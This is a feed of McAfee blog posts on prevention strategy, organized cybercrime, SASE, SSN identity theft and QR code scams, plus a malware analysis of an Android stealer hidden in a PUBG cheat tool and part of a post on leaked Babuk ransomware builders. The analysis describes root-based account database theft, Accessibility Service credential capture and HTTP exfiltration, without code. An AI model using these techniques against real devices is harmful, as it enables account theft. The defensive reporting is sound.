McAfee Blogs Securing Tomorrow. Today. Fri, 22 Oct 2021 17:17:39 +0000 en-US hourly 1 McAfee Blogs 32 32 Why an Ounce of Cybersecurity Prevention is Worth a Pound of Detection Mon, 25 Oct 2021 15:01:22 +0000

Cybersecurity detection is a criminal investigation. Cybercrime investigators are experts who are in limited supply.  Sometimes their hunt begins while...

The post Why an Ounce of Cybersecurity Prevention is Worth a Pound of Detection appeared first on McAfee Blogs.


Cybersecurity detection is a criminal investigation. Cybercrime investigators are experts who are in limited supply.  Sometimes their hunt begins while an intrusion is in process, but more often than not, it occurs after the attack when a crime has occurred. The investigation is taunting and less glamorous, realizing that it can take an average of 228 days even to identify the breach[i].

At that point, you’re looking to find out what your adversaries have seen or stolen, you want to plug the holes that enabled the hack and kick out or remove the adversary completely. Figure on an average of 80 days to resolve and contain a breach. Meanwhile, your adversary spends the epic dwell time in your environment to monitor your traffic and behavior before determining their next move.

Do the math on that exercise and, unless you have generous funding, you may conclude that your resources stretch further by focusing on prevention rather than detection. While eliminating detection may not be practical, you can at least realign your spending and shore up your prevention efforts with enhanced actionable information.

Several things have happened to make this shift possible. First, detection is now often automated and highly productive. Second, advance warning is better than ever. You can apply predictive analytics to leverage in-depth threat intelligence sources to produce real-time, automated assessments of your security posture risks from device to cloud.

Proactive Threat Hunting

Making the shift from detection to prevention didn’t happen overnight for the Service public de Wallonie (SPW), the public administration arm of the French-speaking regional government of Wallonia in Belgium. SPW’s endpoint security team oversees 9,000 desktops, 1,300 servers, and 1,000 applications used by more than 8,000 employees.

When SPW implemented MVISION Insights, the security team sought to identify potential threats lurking outside the agency’s perimeter. Using data gathered from one billion sensors globally that have been distilled and analyzed by artificial intelligence and human experts, MVISION Insights provides comprehensive risk intelligence filtered for a specific industry and geography. It helps SPW’s security team to prioritize which threats and campaigns are most likely to target them.

Before making this shift, SPW’s team regularly spent hours checking out various security sites, lab reports, and news articles to track the latest threat campaigns. After deploying MVISION Insights, the same result arrived in seconds or minutes. Now they’re engaging in more proactive threat hunting and attack prevention by tapping into predictive assessments and adjusting their posture accordingly.

A Change of Posture

Organizations such as SPW illustrate that playing both offense and defense becomes necessary to reduce time-to-detect and dwell time. Detection is difficult for several reasons, most notably the deluge of advanced persistent threats (APTs). And it’s also complicated by the cost of threat hunting talent, given the current shortage of cybersecurity expertise.

These days there’s such an overwhelming amount of security data pouring into data lakes that manually aggregating and analyzing it to make sense of anything requires a fair amount of threat expertise. Then there’s the time it takes to triage and determine the following steps to thwart an attack. By the time you’re analyzing this data, at best, you’re in a reactive state with limited visibility and understanding of your local environment.

One effective way to streamline that process is to apply the proven MITRE ATT&CK® framework, which provides an excellent knowledge base to help with threat hunting and detection. We use that framework to better inform MVISION XDR powered by MVISION Insights, for example. As we mentioned in March, we align XDR with MITRE to greatly expand the depth of our investigation, threat detection, and prevention capabilities to prevent the attack chain with relevant insights.

Meet the Proactive Evolution Series to Help Become More Preventive

In our leading role in the cybersecurity community, we gather a lot of intelligence and invest considerable time curating content to ensure that what we share is timely, accurate, and valuable. This is reflected in MVISION Insights with over 1000 threat campaign profiles. If you place MVISION Insights in your environment it goes beyond threat intelligence.  You also gain prioritized threat insights on a likely attack targeting you, where your gaps are and what you can do. Introducing our new Proactive Evolution series to get regular information on how to become more preventive and protective with LinkedIn Live discussions, blog posts, and other intelligence from our cybersecurity expert contributors highlighting the power of MVISION Insights.

This new Proactive Evolution Series features helpful content intended for managing or building security operations to be more effective and preventive or for a CISO who wants to stay on top of changing best practices.

Detection is often done in reaction to an attack or a looming threat. Not every organization can do both detection and prevention equally well. That’s usually because they lack dedicated or experienced threat hunters or suitable detection technologies. By shifting your efforts to a proactive prevention strategy, you’re boosting your chances to harden your systems before an attack.

Click here to access McAfee Enterprise’s new Proactive Evolution Series content.

Event Replay

The Proactive Evolution is Now

Understand how the adversary is working and how you stack up against them. Together, Raj and Brett dig into how MVISION Insights helps you determine which active threat campaigns you need to worry about, if you’re a target, and what you can do.

View Now

[1] Ponemon & IBM Research, Cost of Data Breach 2020

The post Why an Ounce of Cybersecurity Prevention is Worth a Pound of Detection appeared first on McAfee Blogs.

Organized Cybercrime: The Big Business Behind Hacks and Attacks Fri, 22 Oct 2021 13:22:59 +0000

There’s a person behind every cybercrime. That’s easy to lose sight of. After all, cybercrime can feel a little anonymous,...

The post Organized Cybercrime: The Big Business Behind Hacks and Attacks appeared first on McAfee Blogs.


There’s a person behind every cybercrime. That’s easy to lose sight of. After all, cybercrime can feel a little anonymous, like a computer is doing the attacking instead of a person. Yet people are indeed behind these attacks, and over the years they’ve been getting organized—where cybercriminals structure and run their operations in ways that darkly mirror the workings of a real business. 

Funny, the notion of hackers running an illegal business just like a regular business. But there you go. What works, apparently works. So, let’s take a closer look at how organized crime goes about its business—and get a little more insight into how we can protect ourselves in the process. 

A classic notion of the cybercriminal is that of a lone hacker, donning a hoodie in a dimly lit room and chipping away at the networks and devices of a business or household. That does happen, such as in the case of the former engineer accused of. Yet increasingly, attacks are orchestrated efforts.  

More and more of today’s cybercrime is a distributed, international affair that relies on several bad actors to see it through. This takes the form of organized crime groups with ringleaders located in one country and developers in others, further supported by operations, marketing, finance, and call center teams in yet other locations—just like a legitimate business, strange as it seems. 

What does that look like in real life? Consider a practical example: an identity theft ring sets up a series of phony websites to hijack personal information. There’s a lot of work that goes into putting up those websites, so let’s start there and see who could be involved. From there, we can work our way up the chain of cybercrime organizations. For starters: 

  • There are the sites themselves. An individual or team codes the site in their location and then hosts them on servers in other locations, often different countries. 
  • There’s a creative team that designed and wrote the sites in such a way that they look convincing enough to potential victims such that they fall for the scam.  
  • Another team takes on a marketing role, where they’re charged with promoting those phony sites to lure in victims through phony emails, ads, and paid search results designed to look like the real thing. 
  • An analytics team determines which lures are the most effective. From there, they share these findings so that the most effective of the phony emails, ads, and search results get used—they may fine-tune the phony websites for performance as well. 

And that’s just for starters. There’s plenty of activity that follows once victims share their personal info on that phony site, spanning yet more business roles: 

  • A data team harvests the stolen data and packages it up for use, whether by the same cybercrime organization or via sale on a dark web marketplace. 
  • A finance team that handles and launders funds as needed—and then pays out partners, employees, and ringleaders of the organization. Plus, it will cover any operational costs like equipment and services used. 
  • A managerial layer may also exist to keep operations running smoothly, coordinating the efforts of all the teams and offering reports to (ring)leadership. 
  • The ringleaders themselves—the ones who conceived this scam, set it in motion, and reap the big dollars from it. Of note, these people may not be technically minded at all. But they are crooks. 

Stepping back and looking at this example, you can see how there are several distinct skillsets at play here. While small groups of hackers could pull off something similar, the most effective of these scams will have a relatively large staff in place to ensure it runs effectively. This is just one broad example, yet it does serve to remind us that sophisticated cybercrime can have a sophisticated organization behind it. 

Other examples include tech support scams that run their own call support centers, corporate ransomware attacks where scammers hijack the company’s social media accounts and shame them into paying. There are yet more examples of bogus call centers, like the ones that will walk individual victims through the process of paying off a ransomware attack with cryptocurrency. Once again, quite an operation. 

Back to the lone hacker in a hoodie for a moment. They’re still out there. In fact, many of them are enabled by larger cybercrime organizations. This can happen in several ways: 

  • Take the phony website example above. The crooks who stole that information may not use it themselves. They may sell it to other cyber crooks for profit instead.  
  • Additionally, larger organizations will sell their malicious code in kits to non-technical and semi-technical hackers so that those crooks can commit crimes of their own.  
  • Some organized cybercrime organizations will simply hire themselves out as a service, unleashing phony website scams like mentioned above, distributed denial of service attacks that flood internet traffic to a halt, and several other types of crime—for the right price.  

It’s a marketplace out there, where our data acts as a kind of currency that’s traded and sold by operators large and small. 

So yes, there’s a person behind every cybercrime. And then there’s you. Along with all things you can do to stop them. 

Earlier this year, I shared how McAfee now solely focuses on people. Organized cybercrime is just one of the many reasons why. While different devices may come and go in our lives, our data always follows us—the very things cybercriminals are after. It’s people who need protection. By protecting you, your identity, and your privacy, along with your devices, we protect you from threats like these, whether they stem from a small-time crook or an organized crime gang. Even lone hackers in hoodies.  

To me, the solution looks something like this: you’re out there enjoying the internet without having to look over your shoulder. You’re just safe. And living your life.  

So as cybercrime becomes more sophisticated, we’re becoming yet more sophisticated at McAfee. And it’s you entirely with you in mind. Online protection should come naturally and give you the confidence to go about your day—protection that is personalized, intelligent, and easier to use so that it adapts based on what you’re doing and what you need at any given moment. That’s our aim. Ease. Freedom. Particularly in a time when criminals are trying their hardest to make you their business as you go about yours. 

The post Organized Cybercrime: The Big Business Behind Hacks and Attacks appeared first on McAfee Blogs.

Realize Your SASE Vision with Security Service Edge and McAfee Enterprise Thu, 21 Oct 2021 14:00:56 +0000

Many people are excited about Gartner’s Secure Access Service Edge (SASE) framework and the cloud-native convergence of networks and security....

The post Realize Your SASE Vision with Security Service Edge and McAfee Enterprise appeared first on McAfee Blogs.


Many people are excited about Gartner’s Secure Access Service Edge (SASE) framework and the cloud-native convergence of networks and security. While originally proposed as fully unified architecture delivering network and security capabilities, the reality soon dawned that enterprise transition to a complete SASE model would be a decade long journey due to factors such as existing investments, operational silos (customer), and vendor consolidation. Consequently, Gartner introduced a new two-vendor approach to SASE that brought together a highly converged WAN Edge Infrastructure platform alongside a highly converged security platform – known as Security Service Edge (SSE).

Figure 1: SASE convergence.

SSE brings together Secure Web Gateway (SWG), Cloud Access Security Broker (CASB), and Zero Trust Network Access (ZTNA) to secure access to the web, cloud services, and private applications, resulting in reduced risk, cost and complexity. McAfee Enterprise has long been a proponent of this approach: we embarked on a project to build the industry’s best SASE security solution over three years ago, introduced our MVISION Unified Cloud Edge solution in early 2020, and have since continued to innovate and set the standard for the Security Service Edge space.

How Did We Get Here?

The fundamental problem that SSE sets out to solve is that enterprises must adequately secure their personnel and their data. This became increasingly difficult as digital transformation spurred widespread cloud adoption and empowered remote and mobile workers. Just a few short years ago we would talk about remote access for short periods of time due to travel, and typically for a small proportion of the workforce. Today we speak in the context of COVID-19 and a vast, permanent “Work From Anywhere” (WFA) cultural shift. Supporting this shift is an accelerated migration into the cloud, where the vast majority of workloads and applications will soon reside.

All of this has taken down the walls that formed the perimeter we relied on heavily in the past. Today our people and our data are outside of that perimeter but inside of cloud applications. Cloud applications run from many locations, sometimes around the globe. Yet our objectives must remain the same. We still must secure our people, we must secure our devices, and we must secure our data on any device, at any time, using any service.

Secure web gateways were one of the gatekeepers to the old perimeter, fundamentally appliances that existed at the border of a network. Cloud access security brokers (CASB) were fundamentally built to secure the inside of cloud services. Virtual Private Networks (VPNs) enabled you to securely interconnect offices and remote users onto a single network. Managing these technologies separately became increasingly problematic as the boundaries between networks, the web, and the cloud began to blur. Organizational policies and compliance requirements must be translated to the administrative setup of a specific vendor’s management consoles. At first pass, this results in more errors in the implementation of these policies. Maintenance is difficult as policy changes must be rolled out and implemented within multiple vendor management interfaces. And when you position these traditional technologies against the problem statement of a “perimeterless” world, they fail. The logical answer to these problems is to converge these technologies together and bring them to the cloud.

The Power of Unification

For more than 3 years, McAfee Enterprise has invested deeply into a unified policy framework. We’ve unified threat engines, data engines. We’ve built a unified user experience and unified administrative experience to deliver against that promise of cloud native security.

A closely integrated SSE infrastructure can address the management challenges of setting up policies in multiple vendor management interfaces by deeply integrating security controls to reduce overhead, complexity, and cost, while increasing performance. But looking at the competitive landscape, this has proven to be easier said than done. Many fall short with it comes to securing data within the cloud, but McAfee Enterprise’s industry-leading Multi-Vector Data Protection capabilities make it incredibly easy to keep data safe no matter where it resides, with unified data classification, policy enforcement, and incident management.

Figure 2: McAfee Enterprise Multi-Vector Data Protection.

Other vendors grew up in the cloud but fall short when it comes to connecting to the private resources all large enterprises still use today. Some vendors are attempting to build-out the entire SSE product set from scratch, perhaps as part of a larger SASE offering. Most of the functions present baseline functional capability and the considerable instability of a complex and very new product.

The McAfee Enterprise Security Service Edge Vision

McAfee Enterprise has planned and executed a strategy for several years that takes MVISION Unified Cloud Edge’s complete set of SSE converged security services and then tie them closely to other highly integrated network services such as those offered by SD-WAN vendors to implement SASE. This approach enables most large enterprises the ability to leverage the majority of the technology partners they have to pull a SASE architecture together using much of the technology infrastructure they already have in place.

Figure 3: Enable secure access to web, cloud, and private apps with MVISION Unified Cloud Edge.

The increased efficiency of an integrated environment reduces the investment in administration, enhances the precision of policy enforcement, and improves the speed with which security control processes can be applied to data and activity in one single pass, improving security efficiency and efficacy. This earlier published blog demonstrates how our integration of Remote Browser Isolation (RBI) greatly improves security protection in a seamless, cost-effective manner.

Figure 4: MVISION Unified Cloud Edge threat protection stack with integrated Remote Browser Isolation.

The convergence and integration of cloud security technologies such as SWG, CASB, ZTNA, DLP, RBI and FWaaS substantially enhance operations, reduce cost, minimize errors, and enable more precise enforcement of organizational policy and management. Expenses are lower as experts in the administration and management of separate security controls are no longer required.

In conclusion, McAfee Enterprise has delivered the best and most rapid path to a comprehensive integrated SSE offering available in the market. Our Unified Cloud Edge (UCE) architecture completes that vision of unified and completely integrated policy management today. MVISION UCE is the security fabric that delivers data and threat protection to any location so you can enable fast and secure direct-to-internet access for your distributed workforce. This results in a transformation to a cloud-delivered SSE that converges with connectivity to reduce cost and complexity while increasing the speed and flexibility of your workforce.

Click here to see more about how MVISION Unified Cloud Edge can get you on the fastest route to SASE, or visit the MVISION UCE homepage to learn more and contact us to get started on your journey.

The post Realize Your SASE Vision with Security Service Edge and McAfee Enterprise appeared first on McAfee Blogs.

How to Report Identity Theft to Social Security Thu, 21 Oct 2021 13:04:51 +0000

In the hands of a thief, your Social Security Number is the master key to your identity.  With a Social Security Number (SSN), a thief can...

The post How to Report Identity Theft to Social Security appeared first on McAfee Blogs.


In the hands of a thief, your Social Security Number is the master key to your identity. 

With a Social Security Number (SSN), a thief can unlock everything from credit history and credit line to tax refunds and medical care. In extreme cases, thieves can use it to impersonate others. So, if you suspect your number is lost or stolen, it’s important to report identity theft to Social Security right away. 

Part of what makes an SSN so powerful in identity theft is that there’s only one like it. Unlike a compromised credit card, you can’t hop on the phone and get a replacement. No question, the theft of your SSN has serious implications. If you suspect it, report it. So, let’s take a look at how it can happen and how you can report identity theft to Social Security if it does. 

Can I change my Social Security number? 

Yes. Sort of. The Social Security Administration can assign a new SSN in a limited number of cases. However, per the SSA, “When we assign a different Social Security number, we do not destroy the original number. We cross-refer the new number with the original number to make sure the person receives credit for all earnings under both numbers.”  

In other words, your SSN is effectively forever, which means if it’s stolen, you’re still faced with clearing up any of the malicious activity associated with the theft potentially for quite some time. That’s yet another reason why the protection of your SSN deserves particular attention. 

How does Social Security identity theft happen? 

There are several ways an SSN can end up with a thief. Some involve physical theft, and others can take the digital route. To what extent are SSNs at risk? Notably, there was the Equifax breach of 2017, which exposed some 147 million SSNs. Yet just because an SSN has been potentially exposed does not mean that an identity crime has been committed with it.  

So, let’s start with the basics: how do SSNs get stolen or exposed? 

  • A lost or misplaced wallet is one way, where you actually lose your SSN card or someone steals it. This is one reason to avoid carrying it on your person unless absolutely necessary. Otherwise, keep it stored in a safe and secure location until you need it, like when starting a new job.  
  • Old-fashioned dumpster diving is another, where someone will rummage through your trash, the trash of a business, or even a public dump in search for personal information, which is why it’s important to shred any documents that have personal information listed. 
  • People can simply overhear you provide your number when you’re on a call or over the course of an in-person conversation. In our digital age, we may not think of eavesdropping as much of a threat, but it still very much is. That’s why we strongly recommend providing such info in a secure, private location out of earshot. 
  • SSNs can get stolen from a place of work, where thieves end up with unsecured documents or information. The same could go for your home, which is another reason to secure your physical SSN cards and any information – physical or digital – that contains them. 
  • Phishing attacks can also lead to SSN theft, whether that’s through an attack aimed at you or at a business that has access to your personal information like SSNs.  
  • Data leaks, like the Equifax leak mentioned above, are another way. Yet while the Equifax breach involved millions of records, smaller breaches can expose SSNs just as readily, like the breaches that have plagued many healthcare providers and hospitals over the past year 

That’s quite the list. Broadly speaking, the examples above give good reasons for keeping your SSN as private and secure as possible. With that, it’s helpful to know that there are only a handful of situations where your SSN is required for legitimate purposes, which can help you can make decisions about how and when to give it out. The list of required cases is relatively short, such as: 

  • When applying for credit or a loan. 
  • Applying for or changing group health care coverage with an insurance provider. 
  • Transactions that require IRS notification, like working with investment firms, real estate purchases, auto purchases, etc. 
  • Registering with a business as a full-time or contract employee (for tax reporting purposes). 

You’ll notice that places like doctor’s offices and other businesses are not listed here, though they’ll often request an SSN for identification purposes. While there’s no law preventing them from asking you for that information, they may refuse to work with you if you do not provide that info. In such cases, ask what the SSN would be used for and if there is another form of identification that they can use instead. In all, your SSN is uniquely yours, so be extremely cautious in order to minimize its potential exposure to theft. 

How to report identity theft to Social Security in three steps 

Let’s say you spot something unusual on your credit report or get a notification that someone has filed a tax return on your behalf without your knowledge. These are possible signs that your identity, if not your SSN, is in jeopardy, which means it’s time to act right away using the steps below: 

1. Report the theft to local and federal authorities. 

File a police report and a Federal Trade Commission (FTC) Identity Theft Report. This will help in case someone uses your Social Security number to commit fraud, since it will provide a legal record of the theft. The FTC can also assist by guiding you through the identity theft recovery process as well. Their site really is an excellent resource. 

2. Contact the businesses involved. 

Get in touch with the fraud department at each of the businesses where you suspect theft has taken place, let them know of your situation, and follow the steps they provide. With your police and FTC reports, you will already have a couple of vital pieces of information that can help you clear your name.  

3. Reach the Social Security Administration and the IRS.

 Check your Social Security account to see if someone has gotten a job and used your SSN for employment purposes. Reviewing earnings associated with your SSN can uncover fraudulent use. You can also contact the Social Security Fraud Hotline at (800) 269-0271 or reach out to your local SSA office for further, ongoing assistance. Likewise, contact the Internal Revenue Service at (800) 908-4490 to report the theft and help prevent someone from submitting a tax return in your name. 

What do I do next? Ongoing steps to take. 

As we’ve talked about in some of my other blog posts, identity theft can be a long-term problem where follow-up instances of theft can crop up over time. However, there are a few steps you can take to minimize the damage and ensure it doesn’t happen again. I cover several of those steps in detail in this blog here, yet let’s take a look at a few of the top items as they relate to SSN theft: 

Consider placing a fraud alert. 

By placing a fraud alert, you can make it harder for thieves to open accounts in your name. Place it with one of the three major credit bureaus (Experian, TransUnion, Equifax), and they will notify the other two. During the year-long fraud alert period, it will require businesses to verify your identity before issuing new credit in your name. 

Look into an all-out credit freeze. 

A full credit freeze is in place until you lift it and will prohibit creditors from pulling your credit report altogether. This can help stop thieves dead in their tracks since approving credit requires pulling a report. However, this applies to legitimate inquires, including any that you make, like opening a new loan or signing up for a credit card. If that’s the case, you’ll need to take extra steps as directed by the particular institution or lender. Unlike the fraud alert, you’ll need to notify each of the three major credit bureaus (Experian, TransUnion, Equifax) when you want the freeze lifted. 

Monitor your credit reports. 

Once every 12 months, you can access a free credit report from Experian, TransUnion, and Equifax. (And as of this writing during the pandemic, this can be done for free on a weekly basis, which is great news.) Doing so will allow you to spot any future discrepancies and offer you options for correcting them. 

Sign up for an identity protection service. 

Using a service to help protect your identity can monitor several types of personally identifiable information and alert you of potentially unauthorized use. Our own Identity Protection Service will do all this and more, like offering guided help to neutralize threats and prevent theft from happening again. You can set it up on your computers and smartphone to stay in the know, address issues immediately, and keep your identity secured.  

Your most unique identifier calls for extra care and protection 

Of all the forms of identity theft, the theft of a Social Security Number is certainly one of the most potentially painful because it can unlock so many vital aspects of your life. It’s uniquely you, even more than your name alone – at least in the eyes of creditors, banks, insurance companies, criminal records, etc. Your SSN calls for extra protection, and if you have any concerns that it may have been lost or stolen, don’t hesitate to spring into action. 

The post How to Report Identity Theft to Social Security appeared first on McAfee Blogs.

Be on the Lookout for a New Wave of QR Code Scams Wed, 20 Oct 2021 13:03:56 +0000

In a world of contact-free pickup and payments, an old hacker’s trick is getting a new look—phony QR code scams. ...

The post Be on the Lookout for a New Wave of QR Code Scams appeared first on McAfee Blogs.


In a world of contact-free pickup and payments, an old hacker’s trick is getting a new look—phony QR code scams. 

QR codes have been around for some time. Dating back to industrial use in the 1990s, QR codes pack high volumes of visual information in a relatively compact space. In that way, a QR code shares many similarities with a barcode, yet a QR code can hold more than 300 times the data of a barcode.  

With the rise of the smartphone, QR codes have taken on more consumer applications. Especially in the latter days of the pandemic in the form of contact-free conveniences. Now, by pointing your smartphone’s camera at a QR code, you can order food at a restaurant, pay for parking, download coupons from the shelf at your drugstore or several other convenient things.  

Yet as it is in places where people, devices, and money meet, hackers are there with a scam ready to go. Enter the QR code scam. By pointing your smartphone’s camera at a bogus QR code and giving it a scan, hackers can lead people to malicious websites and commit other attacks on their phones.  

The good news is that there are several ways you can spot these scams, along with several other ways you can avoid them altogether, all so you can get the best out of QR code convenience without the hassle. 

QR code scams: a new twist on an old trick 

In several ways, the QR code scam works much like any other phishing attack. With a few added wrinkles, of course.  

Classically, phishing attacks use doctored links that pose as a legitimate website in the hopes you’ll follow them to a hacker’s malicious website. Once there, that site is designed to trick you into providing your personal information, credit card numbers, and so forth, perhaps in the context of a special offer or a phony account alert. Likewise, it could send you to a site that simply infects your device with malware.  

It’s much the same with a QR code, yet here’s are a couple of big differences:  

  • The QR code itself. There’s really no way to look at a QR code and determine if it’s legitimate or not, such as by spotting clever misspellings, typos, or adaptations of a legitimate URL.  
  • Secondly, QR codes can access other functions and apps on your smartphone. Scammers can use them to open payment apps, add contacts, write a text, or make a phone call when you scan a bogus QR code. 

Where do phony QR codes show up? 

Aside from appearing in emails, direct messages, in social media ads, and such, there are plenty of other places phony QR codes can show up. Here are a few that have been making the rounds in particular: 

  • Locations where a hacker may have replaced an otherwise legitimate QR code with a phony one, like in public locations such as in airports, bus stops, and restaurants. 
  • On your windshield, in the form of fake parking tickets designed to make you think you parked illegally and need to pay a fine. 
  • They can also show up in flyers, fake ads on the street, and even phony debt consolidation offers by mail. 

Scanning a QR code may open a notification on your smartphone screen to follow a link. Like other phishing-type scams, hackers will do their best to make that link look legitimate. They may alter a familiar company name so that it looks like it could have come from that company. Also, they may use link shorteners that take otherwise long web addresses and compress them into a short string of characters—the trick there being that you really have no way of knowing where it will send you simply by looking at it. 

In this way, there’s more to using QR codes than simply “point and shoot.” A mix of caution and eagle-eyed consideration is called for to spot the legitimate uses from the malicious ones. 

How to avoid QR code scams 

Luckily some very basic rules about avoiding QR code attacks. The U.S. Better Business Bureau (BBB) has put together a great list that can help. Their advice is right on the mark, which we’ve paraphrased and added to here: 

1. Don’t open links or scan QR codes from strangers. Unsolicited messages with these links or codes could lead you to a scam site or access the functionality of your smartphone in unwanted ways. 

2. Some scams will appear to come from legitimate sources. Double-check and see if it indeed is. You can check the official website to confirm, such as by accessing your account or contacting a customer service rep to follow up on the communication sent to you. 

3. Try alternative payment methods. If you receive a bill with a QR code for payment, see if there’s another way to pay it—such as on the company’s website or simply through online bill pay to their known, legitimate address. These are less susceptible to fraud. Likewise, check to see if the requested payment is legitimate in the first place. 

4. Think twice about following shortened links. As mentioned above, shortened links can be a shortcut to a malicious website. This can particularly be the case with unsolicited communications. And it can still be the case with a friend or family member if their device or account has been hacked.  

5. If someone you know sends you a QR code, also confirm before scanning it. Whether you receive a text message from a friend or a message on social media from your workmate, contact that person directly before you scan the QR code to make sure they haven’t been hacked. 

6. Watch out for tampering. Hackers have been known to stick their own QR codes over legitimate ones. If you see any sign of altering or placement that looks slapdash, don’t give that code a scan. 

7. Install mobile security. Comprehensive online protection software can protect your mobile devices as well as your computers and laptops. In this case, it can detect bad links associated with QR codes and steer you clear of accessing the malicious sites and downloads associated with them.   

QR codes—a handy, helpful tool that still requires your caution 

QR codes have made transactions smoother and accessing helpful content on our phones much quicker, especially in recent months as they’ve seen an uptick in use. And useful as they are like other means of paying or browsing online, keep an eye open when using them. With this advice as a guide, if something doesn’t feel right, keep your smartphone in your pocket and away from that QR code. 

The post Be on the Lookout for a New Wave of QR Code Scams appeared first on McAfee Blogs.

Social Network Account Stealers Hidden in Android Gaming Hacking Tool Tue, 19 Oct 2021 13:02:15 +0000

Authored by: Wenfeng Yu McAfee Mobile Research team recently discovered a new piece of malware that specifically steals Google, Facebook,...

The post Social Network Account Stealers Hidden in Android Gaming Hacking Tool appeared first on McAfee Blogs.


Authored by: Wenfeng Yu

McAfee Mobile Research team recently discovered a new piece of malware that specifically steals Google, Facebook, Twitter, Telegram and PUBG game accounts. This malware hides in a game assistant tool called “DesiEsp” which is an assistant tool for PUBG game available on GitHub. Basically, cyber criminals added their own malicious code based on this DesiEsp open-source tool and published it on Telegram. PUBG game users are the main targets of this Android malware in all regions around the world but most infections are reported from the United States, India, and Saudi Arabia. 

What is an ESP hack? 

ESP Hacks, (short for Extra-Sensory Perception) are a type of hack that displays player information such as HP (Health Points), Name, Rank, Gun etc. It is like a permanent tuned-up KDR/HP Vision. ESP Hacks are not a single hack, but a whole category of hacks that function similarly and are often used together to make them more effective. 

How can you be affected by this malware? 

After investigation, it was found that this malware was spread in the channels related to PUBG game on the Telegram platform. Fortunately, this malware has not been found on Google Play. 

Figure 1. Re-packaged hacking tool distributed in Telegram
Figure 1. Re-packaged hacking tool distributed in Telegram

Main dropper behavior 

This malware will ask the user to allow superuser permission after running: 

Figure 2. Initial malware requesting root access. 
Figure 2. Initial malware requesting root access.

If the user denies superuser request the malware will say that the application may not work: 

Figure 3. Error message when root access is not provided 
Figure 3. Error message when root access is not provided

When it gains root permission, it will start two malicious actions. First, it will steal accounts by accessing the system account database and application database.  

Figure 4. Get google account from android system account database.
Figure 4. Get a Google account from the Android system account database.

Second, it will install an additional payload with package name” using the “pm install” command. The payload package will be in the assets folder, and it will disguise the file name as “*.crt” or “*.mph”. 

Figure 5. Payload disguised as a certificate file (crt extension) 
Figure 5. Payload disguised as a certificate file (crt extension)

Stealing social and gaming accounts 

The dropped payload will not display icons and it does not operate directly on the screen of the user’s device. In the apps list of the system settings, it usually disguises the package name as something like “” to make users think it is a system service of Google. It runs in the background in the way of Accessibility Service. Accessibility Service is an auxiliary function provided by the Android system to help people with physical disabilities use mobile apps. It will connect to other apps like a plug-in and can it access the Activity, View, and other resources of the connected app. 

The malware will first try to get root permissions and IMEI (International Mobile Equipment Identity) code that later access the system account database. Of course, even if it does not have root access, it still has other ways to steal account information. Finally, it also will try to activate the device-admin to difficult its removal. 

Methods to steal account information 

The first method to steal account credentials that this malware uses is to monitor the login window and account input box text of the stolen app through the AccessibilityService interface to steal account information. The target apps include Facebook (com.facebook.kakana), Twitter (, Google ( and PUBG MOBILE game (com.tencent.ig) 

The second method is to steal account information (including account number, password, key, and token) by accessing the account database of the system, the user config file, and the database of the monitored app. This part of the malicious code is the same as the parent sample above: 

Figure 6. Malware accessing Facebook account information using root privileges 
Figure 6. Malware accessing Facebook account information using root privileges

Finally, the malware will report the stolen account information to the hacker’s server via HTTP.  

Gaming users infected worldwide 

PUBG games are popular all over the world, and users who use PUBG game assistant tools exist in all regions of the world. According to McAfee telemetry data, this malware and its variants affect a wide range of countries including the United States, India, and Saudi Arabia:  

Figure 7. Top affected countries include USA, India and Saudi Arabia
Figure 7. Top affected countries include USA, India , and Saudi Arabia


The online game market is revitalizing as represented by e-sports. We can play games anywhere in various environments such as mobiles, tablets, and PCs (personal computers). Some users will be looking for cheat tools and hacking techniques to play the game in a slightly advantageous way. Cheat tools are inevitably hosted on suspicious websites by their nature, and users looking for cheat tools must step into the suspicious websites. Attackers are also aware of the desires of such users and use these cheat tools to attack them. 

This malware is still constantly producing variants that use several ways to counter the detection of anti-virus software including packing, code obfuscation, and strings encryption, allowing itself to infect more game users. 

McAfee Mobile Security detects this threat as Android/Stealer and protects you from this malware attack. Use security software on your device. Game users should think twice before downloading and installing cheat tools, especially when they request Superuser or accessibility service permissions. 

Indicators of Compromise 

Dropper samples 












Payload samples 











The post Social Network Account Stealers Hidden in Android Gaming Hacking Tool appeared first on McAfee Blogs.

Is There Really Such a Thing as a Low-Paid Ransomware Operator? Tue, 19 Oct 2021 04:01:35 +0000

Introduction Going by recent headlines you could be forgiven for thinking all ransomware operators are raking in millions of ill-gotten...

The post Is There Really Such a Thing as a Low-Paid Ransomware Operator? appeared first on McAfee Blogs.



Going by recent headlines you could be forgiven for thinking all ransomware operators are raking in millions of ill-gotten dollars each year from their nefarious activities.

Lurking in the shadows of every large-scale attack by organized gangs of cybercriminals, however, there can be found a multitude of smaller actors who do not have access to the latest ransomware samples, the ability to be affiliates in the post-DarkSide RaaS world or the financial clout to tool up at speed.

So what is a low-paid ransomware operator to do in such circumstances?

By getting creative and looking out for the latest malware and builder leaks they can be just as devastating to their victims and, in this blog, we will track the criminal career of one such actor as they evolve from homemade ransomware to utilizing major ransomware through the use of publicly leaked builders.

The Rich Get Richer

For years, the McAfee Enterprise Advanced Threat Research (ATR) team has observed the proliferation of ransomware and the birth and (apparent) death of large organized gangs of operators. The most notorious of these gangs have extorted huge sums of money from their victims, by charging for decryption of data or by holding the data itself to ransom against the threat of publication on their ‘leak’ websites.

With the income of such tactics sometimes running into the millions of dollars, such as with the Netwalker ransomware that generated 25 million USD between 1 March and 27 July 2020, we speculate that much of those ill-gotten funds are subsequently used to build and maintain arsenals of offensive cyber tools, allowing the most successful cybercriminals to stay one step ahead of the chasing pack

Figure 1: Babuk group looking for a corporate VPN 0-Day

As seen in the image above, cybercriminals with access to underground forums and deep pockets have the means to pay top dollar for the tools they need to continually generate more income, with this particular Babuk operator offering up 50,000 USD for a 0-day targeting a corporate virtual private network (VPN) which would allow easy access to a new victim.

The Lowly-Paid Don’t Necessarily Stay That Way

For smaller ransomware operators, who do not have affiliation with a large group, the technical skills to create their own devastating malware or the financial muscle to buy what they need, the landscape looks rather different.

Unable to build equally effective attack chains, from initial access through to data exfiltration, their opportunities to make illegal profits are far slimmer in comparison to the behemoths of the ransomware market.

Away from the gaze of researchers who typically focus on the larger ransomware groups, many individuals and smaller groups are toiling in the background, attempting to evolve their own operations any way they can. One such method we have observed is through the use of leaks, such as the recent online posting of Babuk’s builder and source code.

Figure 2: Babuk builder public leak on Twitter

Figure 3: Babuk source code leak on underground forum

McAfee Enterprise ATR has seen two distinct types of cybercriminal taking advantage of leaks such as this. The first group, which we presume to be less tech-savvy, has merely copied and pasted the builder, substituting the Bitcoin address in the ransom note with their own. The second group has gone further, using the source material to iterate their own versions of Babuk, complete with additional features and new packers.

